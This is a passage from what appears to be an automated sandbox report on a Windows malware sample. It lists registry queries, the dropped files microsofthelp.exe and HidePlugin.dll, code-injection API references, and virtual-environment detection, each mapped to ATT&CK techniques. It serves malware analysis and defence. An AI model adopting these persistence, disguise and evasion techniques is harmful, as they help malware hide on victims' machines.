\"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"microsofthelp.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" touched file \"C:\\Windows\\microsofthelp.exe\"\n \"microsofthelp.exe\" touched file \"C:\\Windows\\HidePlugin.dll\"\n \"microsofthelp.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"microsofthelp.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\iphlpapi.dll\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\system32\\iphlpapi.dll\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\WINNSI.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\system32\\WINNSI.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\version.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" trying to touch file \"C:\\Windows\\microsofthelp.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" writes file \"c:\\windows\\microsofthelp.exe\"\n \"microsofthelp.exe\" writes file \"c:\\windows\\hideplugin.dll\"\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" writes file \"%windir%\\microsofthelp.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"75C882C2ECAEC085B72035E6A233AC566593EA51C579D1FACA791C0427C239F0\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"microsofthelp.exe.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]\n \"microsofthelp.exe\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- Location: [%WINDIR%\\microsofthelp.exe]- [targetUID: 00000000-00005864]\n \"MICROSOFTHELP.EXE.67A47CC6.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Contains ability to detect virtual environment (API)\n Matched sigs: Possibly tries to evade analysis by sleeping many times\n Matched sigs: Contains ability to delay the execution of current thread", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API \"VirtualAlloc\" (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")\n Found reference to API \"VirtualFree\" (Indicator: \"VirtualFree\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-141", "type": 2, "relevance": 1, "name": "Contains ability to retrieve open application windows (API string)", "description": "Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; File: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00001224.00000000.76170.00401000.00000040.mdmp, 00000000-00001224.00000001.77777.00401000.00000040.mdmp\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005864.00000000.66397.00401000.00000040.mdmp\")\n Found reference to API \"GetActiveWindow\" (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005876.00000000.66474.00401000.00000040.mdmp, 00000000-00005876.00000002.70318.00401000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\")\n \"microsofthelp.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"microsofthelp.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00001224)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-87", "type": 1, "relevance": 3, "name": "Contains ability to detect virtual environment (API)", "description": "GetTickCount@KERNEL32.DLL at 00000000-00005864-31702-5-00401B70\n GetTickCount@KERNEL32.DLL at 00000000-00005876-33596-5-00401B70\n GetTickCount@KERNEL32.DLL at 00000000-00001224-36783-5-00401B70", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"IsWow64Process\" with parameter \"5864\" - (UID: 00000000-00005864)\n \"microsofthelp.exe\" called \"IsWow64Process\" with parameter \"5876\" - (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002a0038cc2a0033cc2a0000000000000000000000270000000001ecd912000000000050e7120095e1b87777297700feffffff435cbc775059bc77aa000000b800000032cc2a0030cc2a0074db1200acdf1200000000000000000000000000000000000000000000000000000c0000000027001c5cbb7760d8b975ffffffff1700000024db1200240000000300000014e0120040e51200acdf12008600000050db120096edbc775acc2a00a06a92758600000074db1200acdf12000000000086008800a06a927574db1200916c92755acc2a00a06a9275a06a9275e4df120002020000 (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005864)\n \"microsofthelp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b4ef1200000000003800000004f01200feffffff8cef1200cf00bd77d600bd7713d1d977380000001c00000004f012000000000060ef120000000000c8ef1200 (UID: 00000000-00005876)\n \"microsofthelp.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"microsofthelp.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005876)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"microsofthelp.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-31", "type": 1, "relevance": 1, "name": "Contains ability to retrieve/open a process", "description": "GetProcessHeap@KERNEL32.DLL at 00000000-00005864-31702-144-0040193E\n GetProcessHeap@KERNEL32.DLL at 00000000-00005876-33596-144-0040193E\n GetProcessHeap@KERNEL32.DLL at 00000000-00001224-36783-144-0040193E", "origin": "Hybrid Analysis Technology", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-89", "type": 1, "relevance": 3, "name": "Contains ability to enumerate files inside a directory", "description": "FindFirstFileA@KERNEL32.DLL at 00000000-00005864-31702-15-00401C80\n FindFirstFileA@KERNEL32.DLL at 00000000-00005876-33596-15-00401C80\n FindFirstFileA@KERNEL32.DLL at 00000000-00001224-36783-15-00401C80", "origin": "Hybrid Analysis Technology", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005864)\n \"75c882c2ecaec085b72035e6a233ac566593ea51c579d1faca791c0427c239f0.exe\" called \"FindNextFileW\" with parameter CSC (UID: 00000000-00005864)\n 